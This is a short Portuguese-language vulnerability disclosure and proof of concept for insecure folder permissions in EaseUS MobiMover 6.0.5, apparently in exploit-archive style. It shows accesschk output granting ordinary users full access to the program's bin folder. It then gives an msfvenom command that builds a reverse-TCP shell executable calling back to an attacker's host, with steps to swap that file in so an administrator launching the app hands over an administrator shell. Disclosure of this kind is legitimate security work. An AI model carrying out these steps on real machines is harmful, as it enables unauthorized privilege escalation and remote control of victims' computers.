
EaseUS MobiMover 6.0.5 Build 21620 - Permissões Inseguras de Arquivos e Pastas
MobiMoverUILaunch.exe sofre de uma vulnerabilidade de elevação de privilégios que pode ser usada por um "Usuário Autenticado" para modificar o arquivo executável do serviço com um binário de sua escolha na pasta bin. A vulnerabilidade existe devido a um conjunto fraco de permissões concedidas ao "Grupo de Usuários Autenticados", que concede o sinalizador (M), também conhecido como "Privilégio de Modificação".

Página do fornecedor: https://www.easeus.com/
Link do software : https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vídeo POC: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Crie um arquivo binário malicioso no Kali Linux com msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Transfira o 'prepare.exe' criado para o host Windows a partir do Kali com acesso de usuário de baixo nível
Mova o arquivo binário 'prepare.exe' criado para 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' para substituir o antigo com acesso de usuário de baixo nível
Quando o Administrador executar o aplicativo, você obterá um shell reverso como administrador